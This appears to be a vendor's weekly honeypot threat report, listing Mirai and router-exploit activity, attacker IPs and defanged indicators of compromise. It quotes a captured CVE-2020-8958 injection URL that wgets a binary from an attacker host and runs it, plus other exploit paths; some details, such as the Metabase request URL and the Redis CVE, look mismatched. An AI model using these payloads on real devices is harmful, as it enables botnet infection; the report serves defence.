Analysis of the activity observed on TEHTRIS honeypot network in week 39 has revealed new indications of compromise and detected popular types of attacks.
Malicious activity of the Mirai botnet
Again this week, traces of the Mirai malware (whose activity is associated with the “Hello, world” User Agent) emanating from 346 different IP addresses have been observed.
C2 servers used in exploit attempts against MWPower
94% of the requests recorded this week on TEHTRIS honeypots were aimed at exploiting the remote Shell command execution vulnerability on MWPower video surveillance recorders, already studied last week . Wget commands refer to 19 malicious servers, 9 of which had been seen previously. The 10 new IoCs are:
IP / Domain Name | Country | AS |
chdestruction.cf | Extension of the Central African Republic | This domain name is associated with the Croatian IP address 45.95.169[.]145 (AS 211619 MAXKO j.d.o.o) |
85.31.46[. ]179 | US | AS 211252 Delis LLC |
80.11.88[. ]106 | EN | AS 3215 Orange |
78.172.126[. ]236 | TR | AS 9121 Turk Telekom |
46.19.141[. ]122 | CN | AS 51852 Private Layer INC |
27.41.9[. ]81 | CN | AS 17816 China Unicom IP network China169 Guangdong province |
175.42.40[. ]49 | CN | AS 4837 CHINA UNICOM China169 Backbone |
118.199.171[. ]77 | CN | AS 4808 China Unicom Beijing Province Network |
110.89.10[. ]163 | CN | AS 4134 Chinanet |
103.83.110[. ]85 | IN | AS 134045 Ishan Netsol Pvt Ltd |
101.0.55[. ]159 | IN | AS 133661 Netplus Broadband Services Private Limited |
Exploit attempts on routers
Apart from requests targeting MWPower devices, attempts to exploit vulnerable routers have been observed, based on known vulnerabilities. For example, the following URLs attempt to exploit:
– CVE-2020-8958 (CVSS3: 7.2) which allows remote code execution on vulnerable NetLink routers:
/boaform/admin/formPing?target_addr=; wget http[:]//46.19.141[.]122/netlink -O -> /tmp/jno;chmod 777 /tmp/jno;sh /tmp/jno'/& waninf=1_INTERNET_R_VID_154$
– A vulnerability in ZyXEL and Billion routers (popular in Thailand) disclosed in 2016 leading to elevation of privilege:
/cgi-bin/ViewLog.asp
– CVE-2018-10561 (CVSS3: 9.8), which exploits a vulnerability on Dasan GPON routers and allows an attacker to bypass authentication by adding /images to a URL and gain control over the device
/GponForm/diag_Form?images/
It should be noted that these attempted attacks are also carried out by malicious actors other than the Mirai malware. TEHTRIS strongly recommends that you always update your devices to be protected against these kinds of known and patched vulnerabilities.
Attempt to exploit Metabase
Observed this week, 3 IP addresses of the operator DigitalOcean-ASN (AS14061) attempting to exploit versions of Metabase (an open-source data management platform) vulnerable to CVE-2021-41277 (CVSS3: 7.5), which allows an attacker to access sensitive files on the targeted server.
Request:
URL: /GponForm/diag_Form?images/
User Agent: l9explore/1.3.0
IoC:
IP | Country | AS |
161.35.86[. ]181 | NL | AS 14061 DIGITALOCEAN-ASN |
134.122.112[. ]12 | US | |
161.35.188[. ]242 | US |
Malicious network activity
Out of all malicious activities on TEHTRIS honeypot network this week, 18% came from IP addresses registered in the United States, 17.21% from IP addresses registered in the Netherlands (mainly from AS AS 202425 IP Volume inc mentioned in week 37) and 15.6% from IP addresses registered in China. In addition, 9.1% came from Bulgarian IP addresses, mainly registered at AS 207812 Dm Auto Eood located in Sofia, which exists since 11/20/2019. Very little information is available about it except that its IP addresses are unfavorably known in public databases due to their suspicious activities. According to DNSlytics, this Bulgarian AS hosts 9 domains such as vip-support[.]org and freedom4ua[.]net. 4 servers are also registered including ns1.cloud[.]mobi and ns2.vip-support[.]org.
Below are the 10 most active IP addresses in attack attempts on TEHTRIS honeypots:
IP address | Percentage count | AS | Country |
89.248.165.68 | 5.174% | AS 202425 IP Volume inc | NL |
89.248.165.97 | 4.276% | AS 202425 IP Volume inc | NL |
89.248.165.166 | 3.981% | AS 202425 IP Volume inc | NL |
79.124.62.82 | 3.754% | AS 207812 Dm Auto Eood | BG |
79.124.62.130 | 3.585% | AS 207812 Dm Auto Eood | BG |
79.124.62.78 | 3.573% | AS 207812 Dm Auto Eood | BG |
79.124.62.86 | 3.465% | AS 207812 Dm Auto Eood | BG |
87.246.7.198 | 3.368% | AS 204428 SS-Net | BG |
5.8.18.18 | 3.251% | AS 202425 IP Volume inc | MD |
89.248.165.17 | 2.949% | AS 202425 IP Volume inc | NL |
In addition, TEHTRIS paid attention to the use of non-standard ports. 13% of events on non-standard ports are TCP requests on port 6379. Port 6379 is used to exploit a vulnerability in Redis instances (database management system) and allows an unauthenticated attacker to remotely access and execute code. This is CVE-2022-20821 (CVSS3: 6.5). 70% of the activity observed on port 6379 originated from Chinese IP addresses.
TEHTRIS recommends limiting the exposure of servers using Redis by only allowing streams from legitimate users.